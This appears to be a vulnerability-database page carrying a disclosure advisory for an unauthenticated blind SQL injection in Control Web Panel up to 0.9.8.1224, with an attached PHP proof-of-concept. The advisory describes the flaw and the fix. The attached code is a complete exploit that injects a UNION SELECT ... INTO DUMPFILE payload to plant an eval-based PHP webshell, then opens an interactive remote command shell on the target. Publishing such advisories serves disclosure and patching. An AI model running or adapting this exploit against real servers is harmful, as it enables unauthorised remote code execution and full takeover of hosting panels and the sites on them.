| Reporter | Title | Published | Views | Family All 7 |
|---|---|---|---|---|
| CVE-2026-57517 | 1 Jul 202615:11 | – | attackerkb | |
| CVE-2026-57517 | 1 Jul 202616:45 | – | circl | |
| CVE-2026-57517 | 1 Jul 202615:11 | – | cve | |
| CVE-2026-57517 Control Web Panel < 0.9.8.1225 Blind SQL Injection via userRes Parameter | 1 Jul 202615:11 | – | cvelist | |
| EUVD-2026-41027 | 1 Jul 202615:11 | – | euvd | |
| CVE-2026-57517 | 1 Jul 202616:16 | – | nvd | |
| CVE-2026-57517 Control Web Panel < 0.9.8.1225 Blind SQL Injection via userRes Parameter | 1 Jul 202615:11 | – | vulnrichment |
---------------------------------------------------------------------
Control Web Panel <= 0.9.8.1224 (userRes) SQL Injection Vulnerability
---------------------------------------------------------------------
[-] Software Link:
https://control-webpanel.com
[-] Affected Versions:
Version 0.9.8.1224 and prior versions.
[-] Vulnerability Description:
User input passed through the "userRes" POST parameter to
https://[CWP_Host]:2083/[CWP_Username]/
is not properly sanitized before being used to construct an SQL query. This
can be exploited by remote, unauthenticated attackers to carry out (blind)
SQL Injection attacks.
Successful exploitation of this vulnerability requires the attacker to know
or correctly guess the username of a valid non-root account on the affected
CWP instance.
NOTE: successful exploitation allows an unauthenticated attacker to execute
arbitrary SQL queries with the privileges of the MySQL root user. Because
this account possesses the global FILE privilege, the vulnerability can be
leveraged to write arbitrary files to writable locations on the underlying
filesystem using MySQL's file output capabilities (e.g., INTO DUMPFILE). By
writing a malicious PHP payload to the web-accessible
/usr/local/cwpsrv/var/services/roundcube/logs/ directory, an attacker might
be able to execute arbitrary PHP code remotely, resulting in full Remote
Code Execution (RCE) on the affected CWP instance with the privileges of
the 'cwpsvc' account.
[-] Proof of Concept:
https://karmainsecurity.com/pocs/CVE-2026-57517.php
[-] Solution:
Upgrade to version 0.9.8.1225 or later.
[-] Disclosure Timeline:
[XX/YY/2025] - Vulnerability discovered
[06/05/2026] - Version 0.9.8.1225 released, issue fixed by the vendor
[26/06/2026] - CVE identifier requested
[26/06/2026] - CVE identifier assigned
[01/07/2026] - Public disclosure
[-] CVE Reference:
CVE-2026-57517 has been assigned to this vulnerability.
[-] Credits:
Vulnerability discovered by Egidio Romano.
[-] Original Advisory:
https://karmainsecurity.com/KIS-2026-12
--- packet storm attached poc ---
<?php
/*
---------------------------------------------------------------------
Control Web Panel <= 0.9.8.1224 (userRes) SQL Injection Vulnerability
---------------------------------------------------------------------
author..............: Egidio Romano aka EgiX
mail................: n0b0d13s[at]gmail[dot]com
software link.......: https://control-webpanel.com
+-------------------------------------------------------------------------+
| This proof of concept code was written for educational purpose only. |
| Use it at your own risk. Author will be not responsible for any damage. |
+-------------------------------------------------------------------------+
[-] Original Advisory:
https://karmainsecurity.com/KIS-2026-12
*/
set_time_limit(0);
error_reporting(E_ERROR);
print "+-----------------------------------------------------------------------+\n";
print "| Control Web Panel <= 0.9.8.1224 Remote Code Execution Exploit by EgiX |\n";
print "+-----------------------------------------------------------------------+\n";
if (!extension_loaded("curl")) die("\n[-] cURL extension required!\n\n");
if ($argc != 3)
{
print "\nUsage......: php $argv[0] <Hostname/IP> <Username>\n";
print "\nExample....: php $argv[0] 127.0.0.1 egix";
print "\nExample....: php $argv[0] cwp.victim.com bob\n\n";
die();
}
function hex_enc($input)
{
for ($i = 0; $i < strlen($input); $i++)
$encoded .= sprintf("%02x", ord($input[$i]));
return "0x{$encoded}";
}
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://{$argv[1]}:2083/{$argv[2]}/");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
//curl_setopt($ch, CURLOPT_PROXY, "http://127.0.0.1:8080");
print "\n[+] Injecting PHP webshell\n";
$sh_fname = uniqid() . ".php";
$phpshell = hex_enc("<?php eval(base64_decode(\$_SERVER['HTTP_C'])); ?>");
$injection = "\" UNION SELECT 1,{$phpshell},3,4,5,6,7,8,9,10,11,12,13 INTO DUMPFILE \"/usr/local/cwpsrv/var/services/roundcube/logs/{$sh_fname}\"#";
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(["userRes" => $injection]));
curl_exec($ch);
print "[+] Executing PHP webshell\n";
$phpcode = "print '___CMD___'; passthru(base64_decode('%s')); print '___CMD___';";
curl_setopt($ch, CURLOPT_URL, "https://{$argv[1]}:2031/roundcube/logs/{$sh_fname}");
curl_setopt($ch, CURLOPT_POST, false);
while(1)
{
print "\ncwp-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
curl_setopt($ch, CURLOPT_HTTPHEADER, ["C: " . base64_encode(sprintf($phpcode, base64_encode($cmd)))]);
preg_match("/___CMD___(.*)___CMD___/s", curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation